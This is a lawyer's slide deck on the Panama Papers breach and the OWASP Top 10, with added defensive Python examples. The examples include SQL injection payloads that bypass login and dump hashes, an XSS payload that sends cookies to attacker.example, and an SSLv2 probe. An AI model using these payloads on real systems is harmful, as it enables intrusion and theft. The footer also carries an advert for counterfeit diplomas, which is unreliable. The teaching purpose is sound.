An exposé for lawyers! What to learn from the
Panama Papers Leak
Adv. Prashant Mali
1Advocate Prashant Mali (www.prashantmali.com)
The Background
• The data breach at Mossack Fonseca, a Panamanian law firm, is being touted as the largest ever in terms of the sheer volume of information leaked.
• The leaked information allegedly details the ways dozens of high-ranking politicians, their relatives or close associates in more than 50 countries, including the U.K., France, Russia, China and India, have used offshore companies to hide income and avoid paying taxes.
The Numbers
• The leak reportedly covers 11.5 million confidential documents dating from the 1970s to late 2015.
• The 2.6 terabytes of leaked data include:
  4.8 million emails
  3 million database files
  2.2 million PDFs
  1.1 million images
  320,000 text documents
How did the Leak happen?
• The leak is reported to stem from an email hack.
• An email server compromise could have happened in multiple ways.
• The firm's client portal was found vulnerable to DROWN (CVE-2016-0800), a cross-protocol attack that works against any server still offering the old, deprecated SSLv2 protocol, and against any other server that shares an RSA key with such a server. Disabling SSLv2 everywhere the key is used is the fix.
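The practical check a firm would want after reading the slide above is "does any of our servers still answer an SSLv2 handshake?". The following is an added example, not code from the original deck or from any tool it mentions: it hand-builds an SSLv2 CLIENT-HELLO (modern TLS libraries refuse to speak SSLv2, so the probe must be done with raw sockets), sends it, and parses the reply. A parsed SERVER-HELLO means SSLv2 is enabled and the host is DROWN-exposed; a TLS alert or a closed connection means it is not. The two sample byte strings at the bottom are constructed by hand for offline testing, not captures from any real server.

```python
import socket
import struct

# SSLv2 CIPHER-KIND values (3 bytes each) with the SSL_CK_* names from the SSLv2 spec.
SSLV2_CIPHER_KINDS = {
    b"\x01\x00\x80": "SSL_CK_RC4_128_WITH_MD5",
    b"\x02\x00\x80": "SSL_CK_RC4_128_EXPORT40_WITH_MD5",
    b"\x03\x00\x80": "SSL_CK_RC2_128_CBC_WITH_MD5",
    b"\x04\x00\x80": "SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5",
    b"\x05\x00\x80": "SSL_CK_IDEA_128_CBC_WITH_MD5",
    b"\x06\x00\x40": "SSL_CK_DES_64_CBC_WITH_MD5",
    b"\x07\x00\xc0": "SSL_CK_DES_192_EDE3_CBC_WITH_MD5",
}


def build_sslv2_client_hello(challenge: bytes = b"\x00" * 16) -> bytes:
    """Build an SSLv2 CLIENT-HELLO record that offers every SSLv2 cipher kind."""
    ciphers = b"".join(SSLV2_CIPHER_KINDS)
    body = (
        b"\x01"                               # MSG-CLIENT-HELLO
        + b"\x00\x02"                         # CLIENT-VERSION: SSLv2
        + struct.pack(">H", len(ciphers))     # CIPHER-SPECS-LENGTH
        + struct.pack(">H", 0)                # SESSION-ID-LENGTH (no resumption)
        + struct.pack(">H", len(challenge))   # CHALLENGE-LENGTH
        + ciphers
        + challenge
    )
    # Two-byte SSLv2 record header: high bit set, lower 15 bits are the length.
    return struct.pack(">H", 0x8000 | len(body)) + body


def parse_sslv2_server_hello(data: bytes):
    """Return the cipher kinds the server accepts if `data` is an SSLv2 SERVER-HELLO, else None.

    A TLS-only server answers with a TLS alert record (first byte 0x15) or simply
    closes the connection; both fall through to None here.
    """
    if len(data) < 3:
        return None
    # The SSLv2 record header is 2 bytes when the high bit is set, otherwise 3 bytes.
    body = data[2:] if data[0] & 0x80 else data[3:]
    # SERVER-HELLO layout: type(1) session-id-hit(1) cert-type(1) version(2)
    #                      cert-len(2) cipher-specs-len(2) conn-id-len(2) cert ciphers conn-id
    if len(body) < 11 or body[0] != 0x04 or body[3:5] != b"\x00\x02":
        return None
    cert_len, cipher_len = struct.unpack(">HH", body[5:9])
    specs = body[11 + cert_len: 11 + cert_len + cipher_len]
    return [
        SSLV2_CIPHER_KINDS.get(specs[i:i + 3], specs[i:i + 3].hex())
        for i in range(0, len(specs) - len(specs) % 3, 3)
    ]


def probe_sslv2(host: str, port: int = 443, timeout: float = 5.0):
    """Send an SSLv2 CLIENT-HELLO to host:port; a list of ciphers means SSLv2 is enabled."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_sslv2_client_hello())
        try:
            data = sock.recv(4096)
        except (socket.timeout, ConnectionError):
            return None
    return parse_sslv2_server_hello(data)


# Constructed sample (not a real capture): an SSLv2 SERVER-HELLO carrying a 4-byte
# dummy certificate that accepts RC4-128-MD5 and 3DES-MD5.
SAMPLE_SSLV2_SERVER_HELLO = (
    b"\x80\x15"          # record header, length 21
    + b"\x04"            # MSG-SERVER-HELLO
    + b"\x00"            # SESSION-ID-HIT: no
    + b"\x01"            # CERTIFICATE-TYPE: X.509
    + b"\x00\x02"        # SERVER-VERSION: SSLv2
    + b"\x00\x04"        # CERTIFICATE-LENGTH
    + b"\x00\x06"        # CIPHER-SPECS-LENGTH
    + b"\x00\x00"        # CONNECTION-ID-LENGTH
    + b"CERT"
    + b"\x01\x00\x80\x07\x00\xc0"
)
# Constructed sample: the TLS "handshake failure" alert a TLS-only server sends instead.
SAMPLE_TLS_ALERT = b"\x15\x03\x01\x00\x02\x02\x28"

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(sys.argv[1], "->", probe_sslv2(sys.argv[1]))
    else:
        print("SSLv2 server sample:", parse_sslv2_server_hello(SAMPLE_SSLV2_SERVER_HELLO))
        print("TLS-only server sample:", parse_sslv2_server_hello(SAMPLE_TLS_ALERT))
```

Run it with a hostname to probe a live server, or without arguments to see the two samples parsed. A clean result on the web server is not the whole story: DROWN also breaks TLS on hosts whose RSA key is reused on any SSLv2-capable service (a mail server, for example), so every host sharing the certificate needs the same check.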
How did the Leak happen?
• The portal was built on the open source Drupal Content Management System (CMS), and the installation was outdated: it had not been updated in two years.
• That outdated Drupal version was vulnerable to SQL injection, a class of flaw that some industry reports have blamed for as many as 97% of data breaches worldwide.
• Other application-layer weaknesses reported on the portal were Cross-Site Scripting, Cross-Site Request Forgery and brute-force login bypass, among others.
How did the Leak happen?
• Security researchers have claimed that certain back-end portions of the site were also reachable with simple requests that any high-school hacker could have guessed.
• Even the firm's Microsoft Outlook Web Access installation was last updated seven years earlier, in 2009.
• The emails were not even encrypted; with application- and system-level security at that standard, it was incredibly easy for attackers to reach admin-level privileges and read everything.
1. Injection
• Injection happens when a page (an account login form, for example) does not validate user input before passing it to an interpreter such as a SQL database.
• Attackers send commands through that input and claim access they are not entitled to.
• Any input that reaches the server can be the vector: sign-in forms, search boxes, comment boxes, URL parameters.
• Business risk: attackers have a direct way of interacting with the server and its database.
• They can steal data, change it, delete it, deny access and do much more!
• In fact, injection attacks such as SQL injection are allegedly responsible for the major data breaches at Ashley Madison and Sony.
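To make the injection slide above, and the outdated-Drupal slide before it, concrete, here is an added example (it is not code from the deck, from Drupal or from any real portal) of the flawed login query next to its parameterized replacement, run against a constructed in-memory SQLite table. The password column holds a placeholder string rather than a real hash; the point is how the query is built, not how passwords are stored.

```python
import sqlite3


def setup_portal_db() -> sqlite3.Connection:
    """Constructed sample data for a client-portal users table; not from any real system."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [
            ("admin", "hash-of-admin-password", "admin"),
            ("client42", "hash-of-client-password", "client"),
        ],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password_hash: str):
    """The flaw: user input is spliced into the SQL text, so quotes and comment
    markers in the input change the statement the database executes."""
    query = (
        "SELECT username, role FROM users WHERE username = '" + username
        + "' AND password_hash = '" + password_hash + "'"
    )
    return conn.execute(query).fetchone()


def login_parameterized(conn: sqlite3.Connection, username: str, password_hash: str):
    """The fix: the statement is fixed text and the values travel as bound parameters,
    so a quote in the username is just a character in a string."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ? AND password_hash = ?",
        (username, password_hash),
    ).fetchone()


# Constructed attacker inputs.
COMMENT_OUT_PASSWORD_CHECK = "admin' --"          # ends the quoted value, comments out the rest
DUMP_OTHER_COLUMNS = "x' UNION ALL SELECT password_hash, role FROM users --"

if __name__ == "__main__":
    db = setup_portal_db()
    print("vulnerable, no password:", login_vulnerable(db, COMMENT_OUT_PASSWORD_CHECK, "anything"))
    print("vulnerable, data leak:  ", login_vulnerable(db, DUMP_OTHER_COLUMNS, ""))
    print("parameterized:          ", login_parameterized(db, COMMENT_OUT_PASSWORD_CHECK, "anything"))
```

The first payload logs in as admin without a password; the second turns the login form into a read of any column in any table. The same payloads return nothing from the parameterized version, which is why bound parameters (or an ORM that uses them) are the fix, and input filtering alone is not.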
2. Broken Authentication & Session Management
• Negligence in customer accounts, password recovery and session handling leads to increased security risk.
• It is essential to have a high degree of control over account log-in: unique user IDs, strong credentials, and sessions that expire and are invalidated on logout.
• Business risk: attackers are able to take over accounts completely.
• In severe cases, stolen database records are sold on the underground black market.
3. Cross-site Scripting
• One of the most common vulnerabilities: the web application reflects or stores attacker-supplied input and sends it to a user's browser as script.
• It poses a threat to both users and the website.
• Attackers do not need to intercept traffic between server and browser; the application itself delivers the malicious code, because it fails to encode untrusted input before placing it in the page.
• Cross-Site Scripting not only harms the website but also allows attackers to redirect users to any other URL, steal session cookies, or act in the victim's name.
• Business risk: attackers can deface the website's homepage and inject malware on the site.
• Usually leads to websites getting blocked by search engines and browsers!
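The defence the slide above implies is output encoding that matches the context the data lands in. The following is an added example, not code from the deck or from any framework: the same constructed attacker comment rendered unsafely, rendered with HTML-body and HTML-attribute encoding, and handed to JavaScript as JSON. Element names, the comment text and the attacker hostname are all made up for illustration.

```python
import html
import json

# Constructed attacker input submitted through a comment box (not a real capture).
ATTACKER_NAME = '" onmouseover="alert(1)'
ATTACKER_COMMENT = (
    '<script>document.location="https://attacker.example/?c="+document.cookie</script>'
)


def render_comment_vulnerable(author: str, body: str) -> str:
    """Stored XSS: untrusted values pasted straight into markup."""
    return f'<div class="comment" data-author="{author}"><p>{body}</p></div>'


def render_comment_safe(author: str, body: str) -> str:
    """Encode for the context: quote=True for an attribute value, default for element text."""
    return (
        f'<div class="comment" data-author="{html.escape(author, quote=True)}">'
        f'<p>{html.escape(body)}</p></div>'
    )


def render_comment_for_script(author: str, body: str) -> str:
    """Handing data to JavaScript: serialise as JSON and escape '<' so a '</script>'
    inside the data cannot terminate the script element early."""
    payload = json.dumps({"author": author, "body": body}).replace("<", "\\u003c")
    return f"<script>var comment = {payload};</script>"


if __name__ == "__main__":
    print(render_comment_vulnerable(ATTACKER_NAME, ATTACKER_COMMENT))
    print(render_comment_safe(ATTACKER_NAME, ATTACKER_COMMENT))
    print(render_comment_for_script(ATTACKER_NAME, ATTACKER_COMMENT))
```

Encoding on output is the primary control; a Content-Security-Policy header that disallows inline script and HttpOnly session cookies are the layers that limit the damage when a developer forgets it somewhere.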
4. Insecure Direct Object References
• This vulnerability shows when simply changing a few numbers in a URL and pressing Enter grants access to data you are not entitled to, because the identifiers were predictable and the server never checked who was asking.
• Multiple predictable patterns allow attackers to walk through the database and read restricted records.
• Business risk: an attacker can access and expose a lot of data.
• Security is compromised, although in many cases the attacker can read more than he can change.
5. Security Misconfiguration
• Misconfigured security is a tough vulnerability to handle, because it covers lapses at every level of the stack: web server, application server, framework, database and operating system.
• Many system admins never change default passwords, or never disable the ports, services and accounts they no longer use.
• Attackers look for such small lapses, combine them, and make something big out of them.
• Business risk: can lead to complete loss of data through alteration, deletion and theft.
• Attackers chain one weakness after another until they reach the database.
6. Sensitive Data Exposure
• Sensitive data should be stored and transmitted only in encrypted form, using well-vetted cryptographic algorithms (TLS in transit, authenticated encryption at rest).
• Passwords are the exception: they should not be encrypted but hashed with a slow, salted password-hashing function, so that even a stolen user table does not reveal them.
• This ensures that even if credit card details or other records are stolen, attackers cannot do anything with them.
• It is critical to keep the data encrypted in such a way that only authorized keys unlock it; key management matters as much as the algorithm.
• Business risk: loss of sensitive data, passwords, credit card information, addresses and bank statements.
• May have serious repercussions on credibility.
7. Missing Function Level Access Control
• Admin functions are the most important ones and must be restricted on the server side; hiding a menu item in the user interface is not a control.
• Many companies never verify that only authorized accounts can reach privileged functions and information.
• Business risk: once the attacker gains admin access, he can change many things, including application data and settings.
• Serious tangible and intangible consequences and loss of credibility.
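Slides 4 and 7 above are two faces of the same missing check: who is asking. This added example (not the deck's code, nor any framework's) shows a document store with an insecure direct object reference next to an object-level ownership check, and an admin-only function guarded on the server by a role check. User names, roles and the document contents are constructed for illustration.

```python
import secrets
from dataclasses import dataclass
from functools import wraps


class Forbidden(Exception):
    """The caller is not allowed to perform the requested action."""


@dataclass
class User:
    name: str
    role: str          # "client" or "admin"


@dataclass
class Document:
    doc_id: str
    owner: str
    content: str


DOCUMENTS = {}         # constructed in-memory store; a real portal would use a database


def store_document(owner: str, content: str) -> Document:
    # An unguessable id defeats the "change a few numbers in the URL" walk, but it is
    # not the access control; the ownership check in get_document is.
    doc = Document(secrets.token_urlsafe(16), owner, content)
    DOCUMENTS[doc.doc_id] = doc
    return doc


def get_document_vulnerable(doc_id: str) -> Document:
    """IDOR: any logged-in user receives any document whose id they know or guess."""
    return DOCUMENTS[doc_id]


def get_document(user: User, doc_id: str) -> Document:
    """Object-level check: look the record up, then verify this user may see it."""
    doc = DOCUMENTS.get(doc_id)
    if doc is None or (doc.owner != user.name and user.role != "admin"):
        # Same error for "missing" and "not yours", so the id space cannot be probed.
        raise Forbidden(f"no access to document {doc_id}")
    return doc


def require_role(role: str):
    """Function-level check, enforced on the server no matter what the UI shows."""
    def decorator(fn):
        @wraps(fn)
        def wrapper(user: User, *args, **kwargs):
            if user.role != role:
                raise Forbidden(f"{fn.__name__} requires role {role!r}")
            return fn(user, *args, **kwargs)
        return wrapper
    return decorator


@require_role("admin")
def delete_document(user: User, doc_id: str) -> bool:
    return DOCUMENTS.pop(doc_id, None) is not None


def can_read(user: User, doc_id: str) -> bool:
    try:
        get_document(user, doc_id)
        return True
    except Forbidden:
        return False


def try_delete(user: User, doc_id: str) -> bool:
    try:
        return delete_document(user, doc_id)
    except Forbidden:
        return False


if __name__ == "__main__":
    alice, bob, root = User("alice", "client"), User("bob", "client"), User("root", "admin")
    deed = store_document("alice", "trust deed")
    print("bob via vulnerable lookup:", get_document_vulnerable(deed.doc_id).content)
    print("bob via checked lookup:   ", can_read(bob, deed.doc_id))
    print("bob deletes:              ", try_delete(bob, deed.doc_id))
    print("admin deletes:            ", try_delete(root, deed.doc_id))
```

The check belongs next to the data access, not in a middleware that can be bypassed by an alternate route to the same function; every endpoint that touches a record asks the same question.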
8. Cross-Site Request Forgery (CSRF)
• A malicious link or hidden form is planted in an image or page on some other website that the customer visits while still logged in to yours.
• The browser attaches the customer's session cookie to the forged request, so the site executes a command the customer never intended and does not even know about.
• Business risk: unexpected requests, purchases and money transfers.
• Nobody could ever be sure which transactions were genuine, and customers will gradually lose trust in the website.
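The standard fix for the slide above is a secret the attacker's page cannot read: a token tied to the session and required on every state-changing request. This added example (not code from the deck or any framework) derives the token from the session id with an HMAC, which keeps verification stateless, and runs a simulated transfer endpoint against three constructed requests: a genuine form submission, the same request forged from another site, and a forged GET hidden in an image tag. The session id, account numbers and request shapes are invented for illustration.

```python
import hashlib
import hmac
import secrets

# Per-deployment secret; in production load it from configuration, never generate it at import.
SERVER_SECRET = secrets.token_bytes(32)


def issue_csrf_token(session_id: str) -> str:
    """Synchronizer token bound to the session: HMAC(server secret, session id)."""
    return hmac.new(SERVER_SECRET, session_id.encode("utf-8"), hashlib.sha256).hexdigest()


def verify_csrf_token(session_id: str, token) -> bool:
    if not isinstance(token, str) or not token:
        return False
    return hmac.compare_digest(issue_csrf_token(session_id), token)


def handle_transfer(request: dict) -> str:
    """Simulated state-changing endpoint. `cookies` is what the browser attaches on its own;
    `form` is whatever the submitting page (ours or the attacker's) chose to send."""
    session_id = request["cookies"].get("session")
    if session_id is None:
        return "401 not logged in"
    if request["method"] != "POST":
        return "405 state changes require POST"
    if not verify_csrf_token(session_id, request["form"].get("csrf_token")):
        return "403 csrf check failed"
    return f"200 transferred {request['form']['amount']} to {request['form']['to']}"


# Constructed sample requests. All three carry the victim's cookie, because the browser
# sends it with every request to our site regardless of which page triggered the request.
VICTIM_SESSION = "sess-7f3a"
LEGIT_REQUEST = {
    "method": "POST",
    "cookies": {"session": VICTIM_SESSION},
    "form": {"to": "ACC-1", "amount": "100", "csrf_token": issue_csrf_token(VICTIM_SESSION)},
}
FORGED_POST = {                      # hidden auto-submitting form on attacker.example
    "method": "POST",
    "cookies": {"session": VICTIM_SESSION},
    "form": {"to": "ATTACKER-ACC", "amount": "9000", "csrf_token": "guess"},
}
FORGED_IMG_GET = {                   # <img src="https://portal/transfer?to=...&amount=...">
    "method": "GET",
    "cookies": {"session": VICTIM_SESSION},
    "form": {"to": "ATTACKER-ACC", "amount": "9000"},
}

if __name__ == "__main__":
    for name, req in [("legit", LEGIT_REQUEST), ("forged POST", FORGED_POST), ("forged GET", FORGED_IMG_GET)]:
        print(f"{name:12s} -> {handle_transfer(req)}")
```

Setting the session cookie with SameSite=Lax (or Strict) is a second, independent layer: the browser then withholds the cookie from cross-site POSTs in the first place. Keep both; the token still protects users on browsers or paths where the cookie attribute does not apply.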
9. Using Components with Known Vulnerabilities
• Application developers routinely build on open source projects, frameworks and libraries whose vulnerabilities they do not track, and so ship code they have never examined.
• Business risk: unknown code brings unknown risk, and a published vulnerability in a component is known to attackers before it is known to you.
• Cross-site scripting, injection flaws and business-logic loopholes are just some of the examples.
• Such vulnerabilities bring data breach, access control, defacement and theft risks.
10. Unvalidated Redirects and Forwards
• The customer is taken to a website that looks exactly like the one he wants, but it is not the same one; fraudsters harvest the information they need through it.
• Most websites do not even know that they are being used as the springboard for such redirects, which look genuine because the link starts with the real domain.
• Customers should be more careful about phishing, but a customer cannot tell whether he has been redirected to a wrong website. The onus is on the website owner!
• Business risk: attackers can install malware or access user accounts through phishing.
• Customers lose trust in the attacked website forever.
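The usual carrier for the slide above is a `next=` or `returnUrl=` parameter on the login page. This added example (not code from the deck or any framework) validates such a parameter with an allow-list, and its test cases walk through the bypasses that naive checks miss: protocol-relative `//host`, backslashes that browsers treat as slashes, `javascript:` schemes, and `user@host` confusion. The parameter name and the allowed hostname are assumptions for illustration.

```python
from urllib.parse import urlsplit


def safe_redirect_target(target: str, allowed_hosts: set, fallback: str = "/") -> str:
    """Return `target` only if it points back into our own site, else `fallback`.

    Accepts: an absolute path ("/matters/42") or an https URL whose host is allow-listed.
    Rejects: other schemes, other hosts, protocol-relative URLs, backslashes and
    control characters (browsers normalise "\\" to "/", urlsplit does not).
    """
    if not target or any(c in target for c in "\\\r\n\x00"):
        return fallback
    parts = urlsplit(target)
    if parts.scheme == "" and parts.netloc == "":
        # Relative reference: require an absolute path, and refuse "//evil.example".
        return target if target.startswith("/") and not target.startswith("//") else fallback
    # Absolute URL: only https to a host we own. urlsplit's hostname ignores any
    # "user:pass@" prefix, so "https://portal.example.com@evil.example/" resolves to evil.example.
    if parts.scheme == "https" and parts.hostname in allowed_hosts:
        return target
    return fallback


# Assumed hostname for the firm's portal; constructed for the example.
ALLOWED_HOSTS = {"portal.example.com"}

if __name__ == "__main__":
    for candidate in [
        "/matters/42",
        "https://portal.example.com/login?x=1",
        "https://evil.example/login",
        "//evil.example/login",
        "/\\evil.example",
        "javascript:alert(1)",
        "https://portal.example.com@evil.example/",
    ]:
        print(f"{candidate!r:45s} -> {safe_redirect_target(candidate, ALLOWED_HOSTS)!r}")
```

Where the destination set is small (a handful of post-login pages), a map from a short key to a fixed path is simpler still and removes the URL parsing from the attack surface entirely.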
Solutions for such Attacks
• A complete web application security solution is needed: one that detects, protects against and monitors for such attacks.
• Total Application Security (TAS) is an integrated web application security and compliance solution.
• It helps organizations detect application-layer vulnerabilities accurately, patch them virtually without any change in code, and continuously monitor for emerging threats and DDoS attacks in order to mitigate them.
• TAS does this with web application scanning (detect), virtual patching through a web application firewall (protect), and continuous traffic monitoring for emerging threats and DDoS attacks (monitor).
• It also includes 24x7 managed service support to perform pen testing, create custom rules, and tune rules toward zero false positives.
Ensure Data Security at your Law firm
• Until recently, the only entities that seemed concerned with data security were large corporations and health care organizations.
• With reports of security breaches making headline news on a weekly basis, data security has become top-of-mind for every business and for every person who carries and uses a credit card.
• The threat of a data breach is a risk for law firms, too.
• The threat is reason enough to enact more stringent security policies, but there is another compelling reason: the security requirements of your own clients.
• Small law firms might think that they are not a target, but even they hold clients' desirable data. It may even be that your law firm is a much easier target than a corporate entity.
• It is a problem law firms cannot ignore, no matter their size.
What can Law firms of any size do to better manage Cyber security?
Control Chaos
• If you need to make changes to security, implement them in a way that does not impede attorneys' ability to perform work for clients.
• Your firm should balance the need to protect client data against the need to access it.
• Consider the remediation steps for preventing CryptoLocker ransomware. You can lock down the firm's firewalls, desktops and email, but if this is done in an overly aggressive manner the changes can have negative side effects: users cannot upload to court websites; one-off applications, like those common in litigation, may fail; email-scanning false positives cause missed email; and so on.
• With planning, training, proper advance notification and staggering the change among users, the side effects can be minimized.
Prepare, Plan and Train
• Disruptions in productivity can be avoided through careful technology selection, planning and preparation.
• These days, maintaining a current firewall is not enough protection. Select the security systems that provide the best mix of ease of use and security.
• Implement new systems and procedures only after they have been vetted and tested by a small group of users.
• Prepare new users by giving them advance notice and creating a training plan that covers the topics in language they understand.
• Security awareness training is designed to increase end users' awareness of the firm's security policies and of potential threats to the firm, and to increase their willingness to adhere to the firm's security requirements.
• It is probably the most important step in preventing incidents such as the CryptoLocker ransomware that has infected numerous law firms in the last few months.
You should plan to cover
• Electronic communications
• Incident reporting
• Internet access
• Mobile device security
• Password policies
• Remote access
• Social media use
• The firm’s Acceptable Use Policy
• Visitor policies
• Wireless access security
Verify Your Vendors
• Your firm's vendors must also follow proper security protocols.
• Vendors, especially those hosting your data in the cloud, need to pay particular attention to securing and protecting your data.
• Review every vendor's commitment to protecting your data, as well as their security certifications, audit reports and policies.
Monitor Your Systems
• Every firm should employ top-notch antivirus, antispam, anti-malware and intrusion detection.
• Manage these critical systems to ensure that protection is active (e.g., not disabled by the end users) and up to date.
• Routinely check firewall logs. They will show the extent to which your users are under attack and make you aware of administrative access to, and changes in, your firewall.
• Periodically check the firewall configuration for unwanted changes.
• You should also manage and monitor user accounts: scan for accounts that have not been used for a period of time, for stale passwords, and for membership in administrative groups.
• Every IT administrator has added users to high-level security groups, such as Domain Admins, in order to test and troubleshoot issues, only to accidentally leave them in groups where they do not belong.
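The account review in the last two bullets above is easy to script once the directory has been exported. This added example (not code from the deck, and not tied to any directory product) runs the checks over a constructed export: idle accounts still enabled, passwords older than policy, disabled accounts left in admin groups, and idle admins. The account names, dates and group names are invented; the thresholds are assumptions to adjust to the firm's policy.

```python
from datetime import datetime, timedelta

ADMIN_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}

# Constructed sample export of the kind a directory tool would produce; not real accounts.
ACCOUNTS = [
    {"name": "jsmith", "enabled": True, "last_logon": "2016-03-28",
     "pw_last_set": "2015-01-10", "groups": ["Domain Users"]},
    {"name": "itadmin", "enabled": True, "last_logon": "2016-04-01",
     "pw_last_set": "2016-02-01", "groups": ["Domain Users", "Domain Admins"]},
    {"name": "contractor1", "enabled": True, "last_logon": "2015-09-01",
     "pw_last_set": "2015-08-30", "groups": ["Domain Users", "Domain Admins"]},
    {"name": "oldpartner", "enabled": False, "last_logon": "2014-06-15",
     "pw_last_set": "2014-01-02", "groups": ["Domain Users", "Administrators"]},
    {"name": "svc-backup", "enabled": True, "last_logon": None,
     "pw_last_set": "2013-05-05", "groups": ["Domain Users"]},
]
AUDIT_DATE = "2016-04-04"   # "today" for the constructed data


def audit_accounts(accounts, today: str, idle_days: int = 90, password_age_days: int = 180):
    """Return (account, finding) pairs for the stale-account conditions the firm should review."""
    now = datetime.fromisoformat(today)
    idle_limit = timedelta(days=idle_days)
    pw_limit = timedelta(days=password_age_days)
    findings = []
    for acct in accounts:
        admin_groups = set(acct["groups"]) & ADMIN_GROUPS
        last_logon = datetime.fromisoformat(acct["last_logon"]) if acct["last_logon"] else None
        # An account that has never logged on counts as idle: it exists but nobody uses it.
        idle = last_logon is None or now - last_logon > idle_limit
        if acct["enabled"] and idle:
            findings.append((acct["name"], "idle account still enabled"))
        if acct["enabled"] and now - datetime.fromisoformat(acct["pw_last_set"]) > pw_limit:
            findings.append((acct["name"], "stale password"))
        if admin_groups and not acct["enabled"]:
            # Disabled accounts can be re-enabled; strip the privilege, do not just disable.
            findings.append((acct["name"], "disabled account still in admin group"))
        if admin_groups and acct["enabled"] and idle:
            findings.append((acct["name"], "idle admin"))
    return findings


if __name__ == "__main__":
    for name, finding in audit_accounts(ACCOUNTS, AUDIT_DATE):
        print(f"{name:12s} {finding}")
```

Run it on a schedule and diff the output against last week's: a new name in the "idle admin" or admin-group list is exactly the troubleshooting leftover the slide describes.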
Make System Entry Difficult
• Law firms of all sizes should be using two-factor authentication.
• Two-factor authentication requires two things from a user before they are allowed to access a system: something the user has and something the user knows.
• The item the user has is a token, either a physical token or an application on a smartphone.
• The thing the user knows is his password or PIN.
• Together, these items provide a significant increase in the security of systems accessed remotely.
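The "application on a smartphone" in the slide above is almost always a TOTP generator (RFC 6238), which is small enough to show in full. This added example (not code from the deck) implements HOTP and TOTP on the server side and a verifier that allows one step of clock drift, compares in constant time, and refuses replays of an already-used code; it also covers slide 2's point about controlling log-in. The secret used for checking is the published RFC 4226/6238 test-vector seed, not a real user's key; `provision_secret` shows how a real per-user secret would be issued for enrolment in an authenticator app.

```python
import base64
import hashlib
import hmac
import secrets
import struct
import time

# The 20-byte seed from the RFC 4226 / RFC 6238 test vectors; used here only to check the code.
RFC_TEST_SECRET = b"12345678901234567890"


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226: HMAC-SHA1 over the big-endian counter, dynamically truncated."""
    digest = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret: bytes, for_time: float, step: int = 30, digits: int = 6) -> str:
    """RFC 6238: HOTP with the counter derived from Unix time."""
    return hotp(secret, int(for_time) // step, digits)


def verify_totp(secret: bytes, code: str, now: float = None, window: int = 1,
                step: int = 30, digits: int = 6, last_counter: int = -1):
    """Return the accepted counter, or None.

    `window` steps of drift either side are tolerated. Store the returned counter per
    user and pass it back as `last_counter` next time: any counter at or below it is
    refused, so a code observed over someone's shoulder cannot be replayed.
    """
    if now is None:
        now = time.time()
    counter = int(now) // step
    for candidate in range(counter - window, counter + window + 1):
        if candidate <= last_counter:
            continue
        if hmac.compare_digest(hotp(secret, candidate, digits), str(code)):
            return candidate
    return None


def provision_secret(nbytes: int = 20):
    """Issue a fresh per-user secret; the base32 form is what authenticator apps import."""
    raw = secrets.token_bytes(nbytes)
    return raw, base64.b32encode(raw).decode("ascii")


if __name__ == "__main__":
    raw, b32 = provision_secret()
    print("enrol with base32 secret:", b32)
    print("current code:", totp(raw, time.time()))
    print("RFC vector at t=59:", totp(RFC_TEST_SECRET, 59))
```

Two practical caveats: rate-limit verification attempts (six digits and a three-step window give a guesser roughly one chance in 333,000 per try, which is only safe if tries are scarce), and keep the server clock synchronised, since a drift of more than one step locks every user out at once.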
Prioritize Physical Security
• Physical security is also important.
• Server room doors and cabinets should be locked whenever possible.
• You may also want to consider investing in an affordable security camera system that includes options for recording physical access.
• Stored data should be encrypted, so that a stolen disk or laptop is a loss of hardware rather than a loss of client data.
• Consider implementing a clean-and-clear desk policy, which requires everyone to log off their computers when not using them and to lock their computers when they walk away.
• The policy should extend to laptops and other data storage devices, which should be locked away when the employee is not present.
• No data, either printed or electronic, should be left unattended.
Engage 3rd Party for Security Audits
• After you have determined your new policies, put new systems and protections in place and trained your end users, you should consider bringing in a third party.
• Someone not regularly involved with the firm's day-to-day IT needs to perform a security analysis.
• An outside security expert will perform a top-down evaluation of your systems, security policies and practices, and will review physical access to the systems.
Try to Break In
• A penetration test is the process of trying to break into a system in order to identify vulnerabilities before an attacker does.
• A pen test has to be executed with care: performed recklessly, it can cause system or network damage through crashes from buffer overflows, Denial of Service (DoS) conditions and misconfiguration of systems. Agree the scope, the testing window and an emergency contact in writing before it starts.
• Strive to repeat pen tests at least annually, or more often.
• If you change your firewall or other major systems during the year, repeat the pen test.
Remediate Carefully
• At the end of a security audit or pen test, you will receive a remediation plan.
• The IT department should carefully review the recommended changes before implementation to consider any possible adverse effects on other systems and end users.
• Some believe that threats are irrelevant for small firms, but nothing could be further from the truth!
• It is increasingly common for clients of law firms to dictate security requirements, so all firms should make strengthening security policies a top priority.
THANK YOU
ADV. PRASHANT MALI
Email: cyberlawconsulting@gmail.com
Web site: www.prashantmali.com
Twitter : @CyberMahaGuru
Ecommerce GST and tax laws in India by prashant mali
 
Ransomware : A cyber crime without solution ? by Prashant Mali
Ransomware : A cyber crime without solution ? by Prashant MaliRansomware : A cyber crime without solution ? by Prashant Mali
Ransomware : A cyber crime without solution ? by Prashant Mali
 
VAPT, Ethical Hacking and Laws in India by prashant mali
VAPT, Ethical Hacking and Laws in India by prashant maliVAPT, Ethical Hacking and Laws in India by prashant mali
VAPT, Ethical Hacking and Laws in India by prashant mali
 
zero day exploits
zero day exploitszero day exploits
zero day exploits
 
Privacy and Privacy Law in India By Prashant Mali
Privacy and Privacy Law in India By Prashant MaliPrivacy and Privacy Law in India By Prashant Mali
Privacy and Privacy Law in India By Prashant Mali
 
Panama-Paper-Leak
Panama-Paper-LeakPanama-Paper-Leak
Panama-Paper-Leak
 

Recently uploaded

办理(waikato毕业证书)新西兰怀卡托大学毕业证双学位证书原版一模一样
办理(waikato毕业证书)新西兰怀卡托大学毕业证双学位证书原版一模一样办理(waikato毕业证书)新西兰怀卡托大学毕业证双学位证书原版一模一样
